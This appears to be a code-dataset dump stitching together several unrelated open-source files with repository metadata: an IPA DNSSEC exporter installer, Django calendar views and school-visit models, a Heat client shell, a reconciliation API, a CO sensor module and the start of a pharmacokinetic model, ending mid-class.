self.assertEquals('', token_manager.GetSecret())
self.assertEquals('', token_manager.GetToken())
secret = 'my secret'
token = 'token for my secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
secret = 'new secret'
token = 'token for new secret'
token_manager.AddSecret(secret)
token_manager.AddToken(token)
self.assertEquals(secret, token_manager.GetSecret())
self.assertEquals(token, token_manager.GetToken())
if __name__ == '__main__':
unittest.main()
|
apache-2.0
| -7,579,290,179,118,641,000
| 30.224719
| 74
| 0.721123
| false
| 3.775815
| true
| false
| false
|
ofayans/freeipa
|
ipaserver/install/odsexporterinstance.py
|
1
|
6389
|
#
# Copyright (C) 2014 FreeIPA Contributors see COPYING for license
#
import os
import pwd
import grp
import ldap
from ipaserver.install import service
from ipaserver.install import installutils
from ipapython.ipa_log_manager import root_logger
from ipapython.dn import DN
from ipapython import ipautil
from ipaplatform.constants import constants
from ipaplatform.paths import paths
from ipaplatform import services
from ipalib import errors, api
class ODSExporterInstance(service.Service):
def __init__(self, fstore=None):
super(ODSExporterInstance, self).__init__(
"ipa-ods-exporter",
service_desc="IPA OpenDNSSEC exporter daemon",
fstore=fstore,
keytab=paths.IPA_ODS_EXPORTER_KEYTAB,
service_prefix=u'ipa-ods-exporter'
)
self.ods_uid = None
self.ods_gid = None
self.enable_if_exists = False
suffix = ipautil.dn_attribute_property('_suffix')
def create_instance(self, fqdn, realm_name):
self.backup_state("enabled", self.is_enabled())
self.backup_state("running", self.is_running())
self.fqdn = fqdn
self.realm = realm_name
self.suffix = ipautil.realm_to_suffix(self.realm)
try:
self.stop()
except Exception:
pass
# checking status step must be first
self.step("checking status", self.__check_dnssec_status)
self.step("setting up DNS Key Exporter", self.__setup_key_exporter)
self.step("setting up kerberos principal", self.__setup_principal)
self.step("disabling default signer daemon", self.__disable_signerd)
self.step("starting DNS Key Exporter", self.__start)
self.step("configuring DNS Key Exporter to start on boot", self.__enable)
self.start_creation()
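    # Typical call sequence (sketch; the host name and realm are placeholders):
    #     exporter = ODSExporterInstance(fstore)
    #     exporter.create_instance('ipa.example.test', 'EXAMPLE.TEST')
    # start_creation() then runs the steps registered above in order.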
def __check_dnssec_status(self):
try:
self.ods_uid = pwd.getpwnam(constants.ODS_USER).pw_uid
except KeyError:
raise RuntimeError("OpenDNSSEC UID not found")
try:
self.ods_gid = grp.getgrnam(constants.ODS_GROUP).gr_gid
except KeyError:
raise RuntimeError("OpenDNSSEC GID not found")
def __enable(self):
try:
self.ldap_enable('DNSKeyExporter', self.fqdn, None,
self.suffix)
except errors.DuplicateEntry:
root_logger.error("DNSKeyExporter service already exists")
def __setup_key_exporter(self):
installutils.set_directive(paths.SYSCONFIG_IPA_ODS_EXPORTER,
'SOFTHSM2_CONF',
paths.DNSSEC_SOFTHSM2_CONF,
quotes=False, separator='=')
def __setup_principal(self):
assert self.ods_uid is not None
for f in [paths.IPA_ODS_EXPORTER_CCACHE, self.keytab]:
try:
os.remove(f)
except OSError:
pass
installutils.kadmin_addprinc(self.principal)
# Store the keytab on disk
installutils.create_keytab(paths.IPA_ODS_EXPORTER_KEYTAB,
self.principal)
p = self.move_service(self.principal)
if p is None:
# the service has already been moved, perhaps we're doing a DNS reinstall
dns_exporter_principal_dn = DN(
('krbprincipalname', self.principal),
('cn', 'services'), ('cn', 'accounts'), self.suffix)
else:
dns_exporter_principal_dn = p
# Make sure access is strictly reserved to the ods user
os.chmod(self.keytab, 0o440)
os.chown(self.keytab, 0, self.ods_gid)
dns_group = DN(('cn', 'DNS Servers'), ('cn', 'privileges'),
('cn', 'pbac'), self.suffix)
mod = [(ldap.MOD_ADD, 'member', dns_exporter_principal_dn)]
try:
self.admin_conn.modify_s(dns_group, mod)
except ldap.TYPE_OR_VALUE_EXISTS:
pass
except Exception as e:
root_logger.critical("Could not modify principal's %s entry: %s"
% (dns_exporter_principal_dn, str(e)))
raise
# limit-free connection
mod = [(ldap.MOD_REPLACE, 'nsTimeLimit', '-1'),
(ldap.MOD_REPLACE, 'nsSizeLimit', '-1'),
(ldap.MOD_REPLACE, 'nsIdleTimeout', '-1'),
(ldap.MOD_REPLACE, 'nsLookThroughLimit', '-1')]
try:
self.admin_conn.modify_s(dns_exporter_principal_dn, mod)
except Exception as e:
root_logger.critical("Could not set principal's %s LDAP limits: %s"
% (dns_exporter_principal_dn, str(e)))
raise
def __disable_signerd(self):
signerd_service = services.knownservices.ods_signerd
if self.get_state("singerd_running") is None:
self.backup_state("singerd_running", signerd_service.is_running())
if self.get_state("singerd_enabled") is None:
self.backup_state("singerd_enabled", signerd_service.is_enabled())
# disable default opendnssec signer daemon
signerd_service.stop()
signerd_service.mask()
def __start(self):
self.start()
def remove_service(self):
try:
api.Command.service_del(self.principal)
except errors.NotFound:
pass
def uninstall(self):
if not self.is_configured():
return
self.print_msg("Unconfiguring %s" % self.service_name)
# just eat states
self.restore_state("running")
self.restore_state("enabled")
# stop and disable service (IPA service, we do not need it anymore)
self.disable()
self.stop()
# restore state of dnssec default signer daemon
signerd_enabled = self.restore_state("singerd_enabled")
signerd_running = self.restore_state("singerd_running")
signerd_service = services.knownservices.ods_signerd
signerd_service.unmask()
# service was stopped and disabled by setup
if signerd_enabled:
signerd_service.enable()
if signerd_running:
signerd_service.start()
installutils.remove_keytab(self.keytab)
installutils.remove_ccache(ccache_path=paths.IPA_ODS_EXPORTER_CCACHE)
|
gpl-3.0
| 3,183,045,108,307,513,300
| 33.535135
| 85
| 0.594929
| false
| 3.943827
| false
| false
| false
|
k-team/KHome
|
modules/co_sensor/local_module.py
|
1
|
1375
|
#-*- coding: utf-8 -*-
import module
from module import use_module
import fields
class COSensor(module.Base):
update_rate = 1000
public_name = 'Capteur CO'
alarm = use_module('Alarm')
class co(fields.sensor.CO,
fields.syntax.Numeric,
fields.io.Graphable,
fields.persistant.Database,
fields.Base):
update_rate = 60
public_name = 'Taux de CO (ppm)'
class limit_value_co(
fields.syntax.Numeric,
fields.io.Readable,
fields.persistant.Database,
fields.Base):
public_name = 'Limite CO (ppm)'
init_value = 5.00
class message_co(
fields.syntax.String,
fields.io.Readable,
fields.io.Writable,
fields.persistant.Database,
fields.Base):
public_name = 'Message d\'alerte CO'
init_value = 'Au #secours il y a la masse de #CO #YOLO #pompier'
class security(fields.Base):
update_rate = 60
def always(self):
try:
sensor = self.module.co()[1]
                limit_value = self.module.limit_value_co()[1]
                message = self.module.message_co()[1]
            except TypeError:
                pass
            else:
                if sensor > limit_value:
self.module.alarm.message(message)
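            # Illustration (readings assumed): if the CO field reports 7.2 ppm
            # while limit_value_co still holds its default of 5.00, the alert
            # text from message_co is forwarded to the Alarm module via
            # self.module.alarm.message(...).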
|
mit
| 4,025,652,573,530,431,000
| 26.5
| 72
| 0.531636
| false
| 3.951149
| false
| false
| false
|
imposeren/django-happenings
|
happenings/views.py
|
1
|
10237
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
# python lib:
from datetime import date, timedelta
# django:
from django.db.models.functions import ExtractHour
from django.views.generic import ListView, DetailView
from django.conf import settings
from django.shortcuts import get_object_or_404
from django.utils.dates import MONTHS_ALT
try:
from django.core.urlresolvers import reverse
except ImportError:
from django.urls import reverse
# thirdparties:
import six
# happenings:
from .models import Event
from .utils.displays import month_display, day_display
from .utils.next_event import get_next_event
from .utils.mixins import JSONResponseMixin
from .utils import common as c
URLS_NAMESPACE = getattr(settings, "CALENDAR_URLS_NAMESPACE", 'calendar')
class GenericEventView(JSONResponseMixin, ListView):
model = Event
def render_to_response(self, context, **kwargs):
self.postprocess_context(context)
if self.request.is_ajax():
return self.render_to_json_response(context, **kwargs)
return super(GenericEventView, self).render_to_response(
context, **kwargs
)
def get_context_data(self, **kwargs):
context = super(GenericEventView, self).get_context_data(**kwargs)
self.net, self.category, self.tag = c.get_net_category_tag(
self.request
)
if self.category is not None:
context['cal_category'] = self.category
if self.tag is not None:
context['cal_tag'] = self.tag
return context
def postprocess_context(self, context, *args, **kwargs):
return
class EventMonthView(GenericEventView):
template_name = 'happenings/event_month_list.html'
def get_year_and_month(self, net, qs, **kwargs):
"""
Get the year and month. First tries from kwargs, then from
querystrings. If none, or if cal_ignore qs is specified,
sets year and month to this year and this month.
"""
now = c.get_now()
year = now.year
month = now.month + net
month_orig = None
if 'cal_ignore=true' not in qs:
            if 'year' in self.kwargs and 'month' in self.kwargs:  # try kwargs
year, month_orig = map(
int, (self.kwargs['year'], self.kwargs['month'])
)
month = month_orig + net
else:
try: # try querystring
year = int(self.request.GET['cal_year'])
month_orig = int(self.request.GET['cal_month'])
month = month_orig + net
except Exception:
pass
        # Return the year and month, and any errors that may have occurred due
        # to an invalid month/year being given.
return c.clean_year_month(year, month, month_orig)
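    # Illustrative walk-through (URL values assumed): a request for
    # /calendar/2015/12/ with net=1 (the "next" arrow) yields year=2015 and
    # month_orig=12, so month becomes 13 and clean_year_month() is relied on to
    # normalise that into January 2016, or to report an error for invalid input.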
def get_month_events(self, *args, **kwargs):
return Event.objects.all_month_events(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventMonthView, self).get_context_data(**kwargs)
qs = self.request.META['QUERY_STRING']
year, month, error = self.get_year_and_month(self.net, qs)
# add a dict containing the year, month, and month name to the context
current = dict(
year=year, month_num=month, month=MONTHS_ALT[month][:3]
)
context['current'] = current
display_month = MONTHS_ALT[month]
if isinstance(display_month, six.binary_type):
display_month = display_month.decode('utf-8')
context['month_and_year'] = u"%(month)s, %(year)d" % (
{'month': display_month, 'year': year}
)
if error: # send any year/month errors
context['cal_error'] = error
all_month_events = list(
self.get_month_events(
year, month, self.category, self.tag, loc=True, cncl=True
).annotate(
start_hour=ExtractHour('start_date')
).order_by('start_hour')
)
context['raw_all_month_events'] = all_month_events
context['show_events'] = False
if getattr(settings, "CALENDAR_SHOW_LIST", False):
context['show_events'] = True
context['events'] = c.order_events(all_month_events, d=True) \
if self.request.is_ajax() else c.order_events(all_month_events)
return context
def postprocess_context(self, context, *args, **kwargs):
qs = self.request.META['QUERY_STRING']
mini = True if 'cal_mini=true' in qs else False
start_day = getattr(settings, "CALENDAR_START_DAY", 0)
# get any querystrings that are not next/prev/year/month
if qs:
qs = c.get_qs(qs)
if getattr(settings, "CALENDAR_PASS_VIEW_CONTEXT_TO_DISPLAY_METHOD", False):
month_display_base_context = dict(context)
month_display_base_context.pop('events', None)
else:
month_display_base_context = None
all_month_events = context['raw_all_month_events']
context['calendar'] = month_display(
context['current']['year'],
context['current']['month_num'],
all_month_events,
start_day,
self.net,
qs,
mini,
request=self.request,
base_context=month_display_base_context,
)
class EventDayView(GenericEventView):
template_name = 'happenings/event_day_list.html'
def get_calendar_back_url(self, year, month_num):
self.request.current_app = self.request.resolver_match.namespace
if URLS_NAMESPACE:
view_name = URLS_NAMESPACE + ':list'
else:
view_name = 'list'
return reverse(view_name, args=(year, month_num), current_app=self.request.current_app)
def check_for_cancelled_events(self, d):
"""Check if any events are cancelled on the given date 'd'."""
for event in self.events:
for cn in event.cancellations.all():
if cn.date == d:
event.title += ' (CANCELLED)'
def get_month_events(self, *args, **kwargs):
return Event.objects.all_month_events(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventDayView, self).get_context_data(**kwargs)
kw = self.kwargs
y, m, d = map(int, (kw['year'], kw['month'], kw['day']))
year, month, day, error = c.clean_year_month_day(y, m, d, self.net)
if error:
context['cal_error'] = error
# Note that we don't prefetch 'cancellations' because they will be
# prefetched later (in day_display in displays.py)
all_month_events = self.get_month_events(
year, month, self.category, self.tag
)
self.events = day_display(
year, month, all_month_events, day
)
self.check_for_cancelled_events(d=date(year, month, day))
context['events'] = self.events
display_month = MONTHS_ALT[month]
if isinstance(display_month, six.binary_type):
display_month = display_month.decode('utf-8')
context['month'] = display_month
context['month_num'] = month
context['year'] = year
context['day'] = day
context['month_day_year'] = u"%(month)s %(day)d, %(year)d" % (
{'month': display_month, 'day': day, 'year': year}
)
context['calendar_back_url'] = self.get_calendar_back_url(year, month)
# for use in the template to build next & prev querystrings
context['next'], context['prev'] = c.get_next_and_prev(self.net)
return context
class EventDetailView(DetailView):
model = Event
context_object_name = 'event'
def get_object(self):
return get_object_or_404(
Event.objects.prefetch_related(
'location', 'categories', 'tags', 'cancellations'
),
pk=self.kwargs['pk']
)
def get_cncl_days(self):
now = c.get_now()
cncl = self.object.cancellations.all()
return [(x.date, x.reason) for x in cncl if x.date >= now.date()]
def check_cncl(self, d):
cncl = self.object.cancellations.all()
return True if [x for x in cncl if x.date == d] else False
def get_context_data(self, **kwargs):
now = c.get_now()
context = super(EventDetailView, self).get_context_data(**kwargs)
e = self.object
for choice in Event.REPEAT_CHOICES:
if choice[0] == e.repeat:
context['repeat'] = choice[1]
context['cncl_days'] = self.get_cncl_days()
event = [e] # event needs to be an iterable, see get_next_event()
if not e.repeats('NEVER'): # event is ongoing; get next occurrence
if e.will_occur(now):
year, month, day = get_next_event(event, now)
next_event = date(year, month, day)
context['next_event'] = date(year, month, day)
context['next_or_prev_cncl'] = self.check_cncl(next_event)
else: # event is finished repeating; get last occurrence
end = e.end_repeat
last_event = end
if e.repeats('WEEKDAY'):
year, month, day = c.check_weekday(
end.year, end.month, end.day, reverse=True
)
last_event = date(year, month, day)
context['last_event'] = last_event
context['next_or_prev_cncl'] = self.check_cncl(last_event)
else:
if e.is_chunk():
# list of days for single-day event chunk
context['event_days'] = ( # list comp
(e.l_start_date + timedelta(days=x))
for x in range(e.start_end_diff + 1)
)
else:
# let template know if this single-day, non-repeating event is
# cancelled
context['this_cncl'] = self.check_cncl(e.l_start_date.date())
return context
|
bsd-2-clause
| 1,189,771,832,417,715,700
| 34.058219
| 95
| 0.57722
| false
| 3.851392
| false
| false
| false
|
radez/python-heatclient
|
heatclient/v1/shell.py
|
1
|
7499
|
# Copyright 2012 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import textwrap
from heatclient.common import utils
import heatclient.exc as exc
def format_parameters(params):
'''
Reformat parameters into dict of format expected by the API
'''
parameters = {}
if params:
for count, p in enumerate(params.split(';'), 1):
(n, v) = p.split('=')
parameters[n] = v
return parameters
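# Worked example: format_parameters('KeyName=heat_key;DBUser=admin') returns
# {'KeyName': 'heat_key', 'DBUser': 'admin'}; values containing ';' or '=' are
# not supported by this simple split.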
def _set_template_fields(hc, args, fields):
if args.template_file:
fields['template'] = json.loads(open(args.template_file).read())
elif args.template_url:
fields['template_url'] = args.template_url
elif args.template_object:
template_body = hc.raw_request('GET', args.template_object)
if template_body:
fields['template'] = json.loads(template_body)
else:
raise exc.CommandError('Could not fetch template from %s'
% args.template_object)
else:
raise exc.CommandError('Need to specify exactly one of '
'--template-file, --template-url '
'or --template-object')
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-c', '--create-timeout', metavar='<TIMEOUT>',
default=60, type=int,
help='Stack creation timeout in minutes. Default: 60')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values used to create the stack.')
@utils.arg('name', metavar='<STACK_NAME>',
help='Name of the stack to create.')
def do_create(hc, args):
'''Create the stack'''
fields = {'stack_name': args.name,
'timeoutmins': args.create_timeout,
'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
hc.stacks.create(**fields)
do_list(hc)
@utils.arg('id', metavar='<NAME/ID>', help='Name and ID of stack to delete.')
def do_delete(hc, args):
'''Delete the stack'''
fields = {'stack_id': args.id}
try:
hc.stacks.delete(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
do_list(hc)
@utils.arg('id', metavar='<NAME/ID>', help='Name and ID of stack to describe.')
def do_describe(hc, args):
'''Describe the stack'''
fields = {'stack_id': args.id}
try:
stack = hc.stacks.get(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
text_wrap = lambda d: '\n'.join(textwrap.wrap(d, 55))
link_format = lambda links: '\n'.join([l['href'] for l in links])
json_format = lambda js: json.dumps(js, indent=2)
formatters = {
'description': text_wrap,
'template_description': text_wrap,
'stack_status_reason': text_wrap,
'parameters': json_format,
'outputs': json_format,
'links': link_format
}
utils.print_dict(stack.to_dict(), formatters=formatters)
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values used to create the stack.')
@utils.arg('id', metavar='<NAME/ID>',
help='Name and ID of stack to update.')
def do_update(hc, args):
'''Update the stack'''
fields = {'stack_id': args.id,
'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
hc.stacks.update(**fields)
do_list(hc)
def do_list(hc, args={}):
'''List the user's stacks'''
kwargs = {}
stacks = hc.stacks.list(**kwargs)
field_labels = ['Name/ID', 'Status', 'Created']
fields = ['id', 'stack_status', 'creation_time']
formatters = {
'id': lambda row: '%s/%s' % (row.stack_name, row.id)
}
utils.print_list(stacks, fields, field_labels,
formatters=formatters, sortby=2)
@utils.arg('id', metavar='<NAME/ID>',
help='Name and ID of stack to get the template for.')
def do_gettemplate(hc, args):
'''Get the template'''
fields = {'stack_id': args.id}
try:
template = hc.stacks.template(**fields)
except exc.HTTPNotFound:
raise exc.CommandError('Stack not found: %s' % args.id)
else:
print json.dumps(template, indent=2)
@utils.arg('-u', '--template-url', metavar='<URL>',
help='URL of template.')
@utils.arg('-f', '--template-file', metavar='<FILE>',
help='Path to the template.')
@utils.arg('-o', '--template-object', metavar='<URL>',
help='URL to retrieve template object (e.g from swift)')
@utils.arg('-P', '--parameters', metavar='<KEY1=VALUE1;KEY2=VALUE2...>',
help='Parameter values to validate.')
def do_validate(hc, args):
'''Validate a template with parameters'''
fields = {'parameters': format_parameters(args.parameters)}
_set_template_fields(hc, args, fields)
validation = hc.stacks.validate(**fields)
print json.dumps(validation, indent=2)
# TODO only need to implement this once the server supports it
#@utils.arg('-u', '--template-url', metavar='<URL>',
# help='URL of template.')
#@utils.arg('-f', '--template-file', metavar='<FILE>',
# help='Path to the template.')
#def do_estimate_template_cost(hc, args):
# '''Returns the estimated monthly cost of a template'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the events for.')
#def do_event_list(hc, args):
# '''List events for a stack'''
# pass
#
#
#@utils.arg('-r', '--resource', metavar='<RESOURCE_ID>',
# help='ID of the resource to show the details for.')
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resource for.')
#def do_resource(hc, args):
# '''Describe the resource'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resources for.')
#def do_resource_list(hc, args):
# '''Show list of resources belonging to a stack'''
# pass
#
#
#@utils.arg('id', metavar='<NAME/ID>',
# help='Name and ID of stack to show the resource details for.')
#def do_resource_list_details(hc, args):
# '''Detailed view of resources belonging to a stack'''
# pass
|
apache-2.0
| 647,137,651,970,098,300
| 34.540284
| 79
| 0.604881
| false
| 3.688637
| false
| false
| false
|
koebbe/homeworks
|
visit/models.py
|
1
|
5342
|
import datetime
from django.db import models
from django.contrib.auth.models import User
import json
import uuid
from qa import models as qamodels
PROGRAM_MODEL_CHOICES = (
('school_wide', '2+2'),
('fellowship', 'Fellowship Model'),
('ptlt', 'PTLT'),
)
class District(models.Model):
name = models.CharField(max_length=255, unique=True)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
class School(models.Model):
name = models.CharField(max_length=255)
district = models.ForeignKey(District, related_name='schools', blank=True, null=True)
program_model = models.CharField(max_length=20, choices=PROGRAM_MODEL_CHOICES)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
class StaffStatus(models.Model):
name = models.CharField(max_length=255, unique=True)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('name', )
verbose_name_plural = "Staff Statuses"
class ProgramDirector(models.Model):
#user = models.OneToOneField(User, null=True, blank=True)
staff = models.OneToOneField('Staff', null=True, blank=True)
schools = models.ManyToManyField(School, blank=True, related_name='programdirectors')
receive_emails = models.BooleanField(default=True)
class Meta:
ordering = ('staff', )
class SiteCoordinator(models.Model):
staff = models.OneToOneField('Staff', null=True, blank=True)
school = models.ForeignKey(School, blank=True, related_name='sitecoordinators')
class Meta:
ordering = ('staff', )
class Staff(models.Model):
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
email = models.EmailField(blank=True, null=True,)
school = models.ForeignKey(School, related_name='staff')
secondary_schools = models.ManyToManyField(School, blank=True, related_name='secondary_staff')
position = models.CharField(max_length=255, blank=True)
grade = models.CharField(max_length=255, blank=True)
#status = models.ForeignKey(StaffStatus, related_name='staff')
user = models.OneToOneField(User, null=True, blank=True)
is_visit_1_trained = models.BooleanField(default=False)
is_visit_2_trained = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
def all_visits(self):
return Visit.objects.filter(models.Q(staff1=self) | models.Q(staff2=self)) # | models.Q(staff3=self))
@property
def name(self):
return "%s %s" % (self.first_name, self.last_name)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('last_name', 'first_name')
verbose_name_plural = "Staff"
class Student(models.Model):
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
first_name = models.CharField(max_length=255, blank=True)
last_name = models.CharField(max_length=255, blank=True)
student_id = models.CharField(max_length=255)
school = models.ForeignKey(School, related_name='students')
gender = models.CharField(max_length=255, blank=True)
racial_identity = models.CharField(max_length=255, blank=True, null=True)
classroom_teachers = models.ManyToManyField(Staff, related_name='students')
grade = models.IntegerField(null=True, blank=True)
manually_added = models.BooleanField(default=False)
is_verified = models.BooleanField(default=False)
is_custom = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
@property
def name(self):
if not self.first_name and not self.last_name:
return "Student ID: %s" % (self.student_id)
else:
return "%s %s" % (self.first_name, self.last_name)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('last_name', 'first_name', 'student_id', 'school')
unique_together = ('student_id', 'school')
class Visit(models.Model):
VISIT_TYPES = (
('noshow', 'No-show'),
('complete', 'Complete'),
('contact_attempt', 'Contact Attempt')
)
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
staff1 = models.ForeignKey(Staff, related_name='visits_as_primary')
student = models.ForeignKey(Student, blank=True, null=True, related_name='visits',)
type = models.CharField(max_length=255, choices=VISIT_TYPES)
created = models.DateTimeField(auto_now_add=True)
staff2 = models.ForeignKey(Staff, related_name='vists_as_secondary', blank=True, null=True)
date_submitted = models.DateField(blank=True, null=True)
is_submitted = models.NullBooleanField(default=False, blank=True, null=True)
answerset = models.OneToOneField(qamodels.AnswerSet)
@property
def school(self):
return self.student.school
@property
def district(self):
return self.student.school.district
def __unicode__(self):
if not self.student:
return "Unfinished visit #%d" % (self.id)
return u"%s: %s" % (self.created, self.student.name)
class Meta:
ordering = ('staff1', 'created', )
|
mit
| 2,329,072,173,996,672,500
| 34.852349
| 109
| 0.670348
| false
| 3.535407
| false
| false
| false
|
robbi5/nomenklatura
|
nomenklatura/views/reconcile.py
|
1
|
3887
|
import json
from flask import Blueprint, request, url_for
from apikit import jsonify, get_limit, get_offset
from werkzeug.exceptions import BadRequest
from nomenklatura.model import Dataset, Entity
from nomenklatura.model.matching import find_matches
section = Blueprint('reconcile', __name__)
def reconcile_index(dataset):
domain = url_for('index', _external=True).strip('/')
urlp = domain + '/entities/{{id}}'
meta = {
'name': 'nomenklatura: %s' % dataset.label,
'identifierSpace': 'http://rdf.freebase.com/ns/type.object.id',
'schemaSpace': 'http://rdf.freebase.com/ns/type.object.id',
'view': {'url': urlp},
'preview': {
'url': urlp + '?preview=true',
'width': 600,
'height': 300
},
'suggest': {
'entity': {
'service_url': domain,
'service_path': '/api/2/datasets/' + dataset.name + '/suggest'
}
},
'defaultTypes': [{'name': dataset.label, 'id': '/' + dataset.name}]
}
return jsonify(meta)
def reconcile_op(dataset, query):
try:
limit = max(1, min(100, int(query.get('limit'))))
except:
limit = 5
matches = find_matches(dataset, query.get('query', ''))
matches = matches.limit(limit)
results = []
for match in matches:
results.append({
'name': match['entity'].name,
'score': match['score'],
'type': [{
'id': '/' + dataset.name,
'name': dataset.label
}],
'id': match['entity'].id,
'uri': url_for('entities.view', id=match['entity'].id, _external=True),
'match': match['score']==100
})
return {
'result': results,
'num': len(results)
}
@section.route('/datasets/<dataset>/reconcile', methods=['GET', 'POST'])
def reconcile(dataset):
"""
Reconciliation API, emulates Google Refine API. See:
http://code.google.com/p/google-refine/wiki/ReconciliationServiceApi
"""
dataset = Dataset.by_name(dataset)
# TODO: Add proper support for types and namespacing.
data = request.args.copy()
data.update(request.form.copy())
if 'query' in data:
# single
q = data.get('query')
if q.startswith('{'):
try:
q = json.loads(q)
except ValueError:
raise BadRequest()
else:
q = data
return jsonify(reconcile_op(dataset, q))
elif 'queries' in data:
# multiple requests in one query
qs = data.get('queries')
try:
qs = json.loads(qs)
except ValueError:
raise BadRequest()
queries = {}
for k, q in qs.items():
queries[k] = reconcile_op(dataset, q)
return jsonify(queries)
else:
return reconcile_index(dataset)
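# Illustrative sketch (not part of the original module): the kind of query a
# Refine-style client sends to the endpoint above. The dataset name 'countries'
# and the query value are assumptions made for the example.
def _example_reconcile_query():
    payload = {'query': 'Germany', 'limit': 3}
    return '/datasets/countries/reconcile?query=' + json.dumps(payload)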
@section.route('/datasets/<dataset>/suggest', methods=['GET', 'POST'])
def suggest(dataset):
"""
Suggest API, emulates Google Refine API. See:
http://code.google.com/p/google-refine/wiki/SuggestApi
"""
dataset = Dataset.by_name(dataset)
entities = Entity.all().filter(Entity.invalid != True) # noqa
query = request.args.get('prefix', '').strip()
entities = entities.filter(Entity.name.ilike('%s%%' % query))
entities = entities.offset(get_offset(field='start'))
entities = entities.limit(get_limit(default=20))
matches = []
for entity in entities:
matches.append({
'name': entity.name,
'n:type': {
'id': '/' + dataset.name,
'name': dataset.label
},
'id': entity.id
})
return jsonify({
"code": "/api/status/ok",
"status": "200 OK",
"prefix": query,
"result": matches
})
|
mit
| -4,379,057,662,769,576,400
| 28.671756
| 83
| 0.545408
| false
| 3.848515
| false
| false
| false
|
james-nichols/dtrw
|
compartment_models/PBPK_test.py
|
1
|
5547
|
#!/usr/local/bin/python3
# Libraries are in parent directory
import sys
sys.path.append('../')
import math
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import pdb
from dtrw import *
class DTRW_PBPK(DTRW_compartment):
def __init__(self, X_inits, T, dT, V, Q, R, mu, Vmax, Km, g, g_T):
if len(X_inits) != 6:
# Error!
print("Need six initial points")
raise SystemExit
super(DTRW_PBPK, self).__init__(X_inits, T, dT)
self.Vs = np.array(V)
self.Qs = np.array(Q)
self.Rs = np.array(R)
self.mu = mu
self.Vmax = Vmax
self.Km = Km
self.g = g
self.g_T = g_T
def creation_flux(self, n):
g_N = 0.
if (n * self.dT < self.g_T):
g_N = self.g * self.dT
creation = np.zeros(self.n_species)
creation[:-1] = self.removal_flux_markovian(n)[5,:]
creation[-1] = (self.removal_flux_markovian(n)[:5, 0]).sum() + g_N
return creation
"""return np.array([(1. - np.exp(-self.dT * self.Qs[0] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[1] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[2] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[3] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[4] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[0] / (self.Vs[0] * self.Rs[0]))) * self.Xs[0,n] + \
(1. - np.exp(-self.dT * self.Qs[1] / (self.Vs[1] * self.Rs[1]))) * self.Xs[1,n] + \
(1. - np.exp(-self.dT * self.Qs[2] / (self.Vs[2] * self.Rs[2]))) * self.Xs[2,n] + \
(1. - np.exp(-self.dT * self.Qs[3] / (self.Vs[3] * self.Rs[3]))) * self.Xs[3,n] + \
(1. - np.exp(-self.dT * self.Qs[4] / (self.Vs[4] * self.Rs[4]))) * self.Xs[4,n] + \
g_N ])"""
def removal_rates(self, n):
rates = np.zeros([self.n_species, 5])
rates[:-1, 0] = self.Qs / (self.Vs[:-1] * self.Rs)
rates[3, 1] = self.mu / self.Vs[3]
rates[4, 1] = self.Vmax / (self.Vs[4] * self.Km + self.Xs[4,n])
rates[5,:] = self.Qs / self.Vs[-1]
return rates
class DTRW_PBPK_anom(DTRW_compartment):
def __init__(self, X_inits, T, dT, V, Q, R, mu, Vmax, Km, g, g_T, alpha):
if len(X_inits) != 6:
# Error!
print("Need six initial points")
raise SystemExit
super(DTRW_PBPK_anom, self).__init__(X_inits, T, dT)
self.Vs = np.array(V)
self.Qs = np.array(Q)
self.Rs = np.array(R)
self.mu = mu
self.Vmax = Vmax
self.Km = Km
